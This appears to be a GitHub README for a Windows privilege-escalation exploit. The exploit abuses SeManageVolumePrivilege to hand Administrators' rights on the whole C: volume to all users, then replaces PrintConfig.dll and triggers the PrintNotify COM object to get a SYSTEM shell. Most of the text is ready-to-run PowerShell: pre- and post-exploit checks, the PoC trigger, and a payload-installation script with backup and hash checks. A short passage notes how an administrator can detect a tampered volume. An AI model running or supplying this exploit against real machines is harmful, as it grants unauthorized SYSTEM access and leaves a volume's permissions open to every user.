CsEnox / SeManageVolumeExploit

SeManageVolumeExploit

This exploit abuses SeManageVolumePrivilege ("Perform volume maintenance tasks") to grant full permission on the C:\ drive to all users on the machine. The calling token must already hold the privilege; by default only Administrators do, so the interesting case is a user or group that has been granted it through policy. The change is written to disk, applies to the whole volume and survives reboots, so it has to be undone with the opposite SID swap.

  • Enables SeManageVolumePrivilege in the current token
  • Opens a handle to \\.\C: with SYNCHRONIZE | FILE_TRAVERSE (no read or write access to the volume is needed)
  • Sends FSCTL_SD_GLOBAL_CHANGE to the volume to replace S-1-5-32-544 (BUILTIN\Administrators) with S-1-5-32-545 (BUILTIN\Users) in every security descriptor on the volume, so every ACE that granted Administrators access now grants it to Users
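The following PowerShell is an added example, not code from the CsEnox/SeManageVolumeExploit repository. It shows the check a practitioner wants before running the exploit (is SeManageVolumePrivilege present in the token at all) and the check afterwards (has the Administrators SID disappeared from the volume root's DACL and Users inherited its rights, and can a low-privileged user now create a file in the spool driver directory). The function names are ours; the volume and probe directory are assumed to be C:\ and the x64\3 spool driver directory discussed below.

```powershell
# Added example (not part of CsEnox/SeManageVolumeExploit): pre-flight and post-exploit
# checks for the Administrators -> Users SID swap on the C: volume.
# Assumptions: run in the low-privileged user's session; the volume of interest is C:.

function Test-SeManageVolumePrivilege {
    # whoami /priv lists every privilege held by the token, enabled or disabled.
    # The privilege only has to be *present*; the exploit enables it itself.
    $lines = whoami /priv
    return [bool]($lines | Where-Object { $_ -match '^SeManageVolumePrivilege\s' })
}

function Get-BuiltinAccess {
    param([string]$Path = 'C:\')
    # ACEs on the volume root for BUILTIN\Administrators (S-1-5-32-544) and
    # BUILTIN\Users (S-1-5-32-545). Resolving by SID avoids locale-dependent names.
    $acl = Get-Acl -Path $Path
    $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object { $_.IdentityReference.Value -in 'S-1-5-32-544', 'S-1-5-32-545' } |
        Select-Object @{ n = 'Sid'; e = { $_.IdentityReference.Value } },
                      FileSystemRights, AccessControlType, IsInherited
}

function Test-VolumeSidSwapped {
    param([string]$Path = 'C:\')
    # After FSCTL_SD_GLOBAL_CHANGE the Administrators SID no longer appears in the
    # root's security descriptor and Users holds the FullControl ACE Administrators had.
    # (ACEs carrying generic rights bits show up as raw numbers; they are ignored here.)
    $aces      = Get-BuiltinAccess -Path $Path
    $adminAces = @($aces | Where-Object Sid -eq 'S-1-5-32-544')
    $usersFull = @($aces | Where-Object {
        $_.Sid -eq 'S-1-5-32-545' -and
        $_.AccessControlType -eq 'Allow' -and
        $_.FileSystemRights.HasFlag([System.Security.AccessControl.FileSystemRights]::FullControl)
    })
    return ($adminAces.Count -eq 0 -and $usersFull.Count -gt 0)
}

function Test-WriteAccess {
    param([string]$Directory = 'C:\Windows\System32\spool\drivers\x64\3')
    # Direct proof: can this user create a file in a directory that is normally
    # writable only by Administrators/TrustedInstaller? Cleans up after itself.
    $probe = Join-Path $Directory ('probe-{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -Path $probe -Force
        return $true
    } catch {
        return $false
    }
}

Write-Host ("SeManageVolumePrivilege present in token : {0}" -f (Test-SeManageVolumePrivilege))
Write-Host ("Administrators -> Users swap applied      : {0}" -f (Test-VolumeSidSwapped))
Write-Host ("Can create files in spool\drivers\x64\3   : {0}" -f (Test-WriteAccess))
Get-BuiltinAccess | Format-Table -AutoSize
```

Run it once before and once after the exploit: the first line tells you whether the exploit can work at all, the second and third confirm that the swap reached the on-disk descriptors. The same two checks, run from an administrative account, are a cheap detection for a volume that has already been tampered with: a C:\ root whose DACL carries no Administrators ACE but a Users FullControl ACE is not a configuration Windows ships with.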

Overwriting "Printconfig.dll" for SYSTEM Shell Access

Once the swap above has taken effect, the ability to write an attacker-controlled file into a protected directory opens up many privilege-escalation paths. One of the simplest is to replace "Printconfig.dll" in "C:\Windows\System32\spool\drivers\x64\3" with a malicious DLL. Instantiating the PrintNotify COM object makes the service that hosts it, which runs as SYSTEM, load PrintConfig.dll from that directory, so whatever the DLL's DllMain does (here, spawn a shell) runs as SYSTEM.

Proof of Concept:

  1. Build a custom x64 DLL and place it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll (keep a copy of the original so printing can be restored afterwards).
  2. Instantiate the PrintNotify object with the following PowerShell commands:

```powershell
# CLSID of the PrintNotify COM class; its server runs inside a SYSTEM service
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
# Creating the instance makes that service load PrintConfig.dll from the spool driver directory
$object = [Activator]::CreateInstance($type)
```

  3. Receive the SYSTEM shell.
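The script below is an added example, not the repository's own code. It wraps the three PoC steps with the checks a practitioner wants: it distinguishes "ACL still denies us" from "the DLL is locked by a process" before trying the overwrite, keeps a backup of the original DLL so printing can be restored, records SHA-256 hashes before and after the copy, and only then triggers the COM load. The `$Payload` path and the function names are assumptions for the example; the PrintNotify service lookup is informational and does nothing if the service is absent on a given build.

```powershell
# Added example (not part of CsEnox/SeManageVolumeExploit): the Printconfig.dll swap
# with pre-checks, backup and hash verification around the PoC trigger.
# Assumptions: $Payload points at an attacker-built x64 DLL (hypothetical path);
# the volume swap described earlier has already been applied.

$Target  = 'C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll'
$Payload = 'C:\Users\Public\payload.dll'        # assumed location of the custom DLL
$Backup  = Join-Path $env:TEMP 'PrintConfig.dll.bak'

function Test-CanReplace {
    param([string]$Path)
    # Open for write without truncating. The failure type tells us why we cannot:
    # UnauthorizedAccessException = ACL still blocks us; IOException = file in use.
    try {
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open,
                              [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
        $fs.Dispose()
        return 'writable'
    } catch {
        $e = $_.Exception.GetBaseException()
        if ($e -is [UnauthorizedAccessException]) { return 'denied' }
        if ($e -is [IO.IOException])              { return 'locked' }
        return 'error: ' + $e.Message
    }
}

function Install-Payload {
    if (-not (Test-Path -Path $Payload)) { throw "payload not found: $Payload" }
    $state = Test-CanReplace -Path $Target
    if ($state -ne 'writable') { throw "cannot replace ${Target}: $state" }
    # Backup once; never overwrite an existing backup with an already-replaced file.
    if (-not (Test-Path -Path $Backup)) { Copy-Item -Path $Target -Destination $Backup }
    $before = (Get-FileHash -Path $Target -Algorithm SHA256).Hash
    Copy-Item -Path $Payload -Destination $Target -Force
    $after  = (Get-FileHash -Path $Target -Algorithm SHA256).Hash
    [pscustomobject]@{ Before = $before; After = $after; Replaced = ($before -ne $after) }
}

function Invoke-PrintNotify {
    # Same trigger as the PoC. The DLL's DllMain runs inside the SYSTEM-hosted COM server
    # as soon as it is loaded; CreateInstance may still throw afterwards because the
    # payload does not implement the class the server expects, so the error is only logged.
    $type = [Type]::GetTypeFromCLSID('{854A20FB-2D44-457D-992F-EF13785D2B51}')
    try {
        [Activator]::CreateInstance($type) | Out-Null
    } catch {
        Write-Warning ("CreateInstance failed after load attempt: {0}" -f $_.Exception.Message)
    }
}

function Restore-Original {
    # Put the genuine DLL back once the SYSTEM shell has been obtained.
    if (Test-Path -Path $Backup) { Copy-Item -Path $Backup -Destination $Target -Force }
}

Get-Service -Name PrintNotify -ErrorAction SilentlyContinue | Select-Object Name, Status, StartType
Install-Payload
Invoke-PrintNotify
# Restore-Original   # uncomment after the shell is in hand
```

If `Test-CanReplace` reports `locked`, the DLL is currently mapped into a process (typically because the hosting service already loaded it); in that case the copy will fail regardless of ACLs, and the service has to release the file before the swap can succeed. The backup-and-restore pair exists because the replaced DLL is loaded by a real print component, and leaving the payload in place breaks printing for everyone on the box and leaves an obvious forensic artifact (a file in the spool driver directory whose hash matches nothing Microsoft ships).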

Credits :

Languages: C 100.0%